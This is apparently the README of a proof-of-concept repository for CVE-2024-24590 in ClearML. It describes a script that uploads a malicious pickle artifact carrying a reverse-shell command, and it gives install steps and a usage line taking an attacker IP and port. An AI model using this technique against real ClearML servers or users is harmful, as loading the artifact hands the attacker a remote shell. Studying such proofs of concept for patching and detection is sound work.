_____ _ __ __ _ _____ ____ _____
/ ____| | | \/ | | | __ \ / __ \ / ____|
| | | | ___ __ _ _ __| \ / | | | |__) | | | | |
| | | |/ _ \/ _` | '__| |\/| | | | ___/| | | | |
| |____| | __/ (_| | | | | | | |____ | | | |__| | |____
\_____|_|\___|\__,_|_| |_| |_|______| |_| \____/ \_____| - 2024-24590 x OxyDe
This project demonstrates how to dynamically upload a pickle artifact to ClearML with configurable parameters via command line arguments. The script initializes a ClearML task, dynamically configures a command for reverse shell execution, and uploads it as an artifact. (PoC-CVE-2024-24590)
- Python 3.6+
clearml
packageargparse
packagepickle
packageos
module
-
Install ClearML package:
pip install clearml
-
Clone the repository:
git clone https://github.com/OxyDeV2/PoC-CVE-2024-24590.git cd PoC-CVE-2024-24590
To run the script, use the following command with the appropriate arguments:
python script.py --project_name "<project_name>" --task_name "<task_name>" --tags <tag1> <tag2> ... --artifact_name "<artifact_name>" --ip "<ip_address>" --port "<port>"
Thanks to Skriix :)